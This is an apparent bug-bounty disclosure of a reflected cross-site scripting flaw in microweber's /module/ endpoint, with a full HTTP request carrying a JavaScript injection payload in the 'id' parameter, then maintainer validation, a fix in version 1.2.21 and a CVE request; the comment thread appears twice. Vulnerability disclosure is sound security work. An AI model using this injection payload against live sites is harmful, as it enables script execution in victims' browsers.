Cross-site Scripting (XSS) - Reflected in microweber/microweber

Valid

Reported on

Jul 14th 2022

Description

Hi team, I found XSS at /module/.

Proof of Concept

Pop up POC: alt text

Reflected POC: alt text

Full request payload:

POST /demo/module/ HTTP/1.1
Host: demo.microweber.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 183
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close

type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings

Impact

XSS

Occurrences

index.php L80-L92

This function does not filter 'id' parameter in script tag, which allows attackers to escape syntax using apostrophe.

We are processing your report and will contact the microweber team within 24 hours. 10 months ago

We have contacted a member of the microweber team and are waiting to hear back 10 months ago

Peter Ivanov

commented 10 months ago

Maintainer

Hello,

Thanks for the report.

We cannot simulate this. Maybe it was fixed in the previous version.

Can you provide video of POC where the user can encounter this error ?

Deshine

commented 10 months ago

Researcher

Hi Peter Ivanov, this is full video POC:

https://github.com/Kingerbans/images/blob/main/2022-07-16%2019-32-39.mp4

Maybe you should download images folder because the video is too big for github to display.

Hope you validate the issue.

Thank you, deshine

We have sent a follow up to the microweber team. We will try again in 7 days. 10 months ago

Peter Ivanov modified the Severity from Medium to Low 10 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Peter Ivanov validated this vulnerability 10 months ago

Deshine has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Peter Ivanov marked this as fixed in 1.2.21 with commit d28655 10 months ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

index.php#L80-L92 has been validated

Deshine

commented 10 months ago

Researcher

Hi @admin @maintainer, I wonder if I can get a CVE for this vulnerability?

Jamie Slome

commented 10 months ago

Admin

Happy to assign a CVE to this report if the maintainer gives their permission.

@maintainer?

Peter Ivanov

commented 10 months ago

Maintainer

yes @admin you can assign CVE

Jamie Slome

commented 10 months ago

Admin

Sorted 👍

Deshine

commented 10 months ago

Researcher

Thanks so much @admin @maintainer.

to join this conversation

We are processing your report and will contact the microweber team within 24 hours. 10 months ago

We have contacted a member of the microweber team and are waiting to hear back 10 months ago

Peter Ivanov

commented 10 months ago

Maintainer

Hello,

Thanks for the report.

We cannot simulate this. Maybe it was fixed in the previous version.

Can you provide video of POC where the user can encounter this error ?

Deshine

commented 10 months ago

Researcher

Hi Peter Ivanov, this is full video POC:

https://github.com/Kingerbans/images/blob/main/2022-07-16%2019-32-39.mp4

Maybe you should download images folder because the video is too big for github to display.

Hope you validate the issue.

Thank you, deshine

We have sent a follow up to the microweber team. We will try again in 7 days. 10 months ago

Peter Ivanov modified the Severity from Medium to Low 10 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Peter Ivanov validated this vulnerability 10 months ago

Deshine has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Peter Ivanov marked this as fixed in 1.2.21 with commit d28655 10 months ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

index.php#L80-L92 has been validated

Deshine

commented 10 months ago

Researcher

Hi @admin @maintainer, I wonder if I can get a CVE for this vulnerability?

Jamie Slome

commented 10 months ago

Admin

Happy to assign a CVE to this report if the maintainer gives their permission.

@maintainer?

Peter Ivanov

commented 10 months ago

Maintainer

yes @admin you can assign CVE

Jamie Slome

commented 10 months ago

Admin

Sorted 👍

Deshine

commented 10 months ago

Researcher

Thanks so much @admin @maintainer.

to join this conversation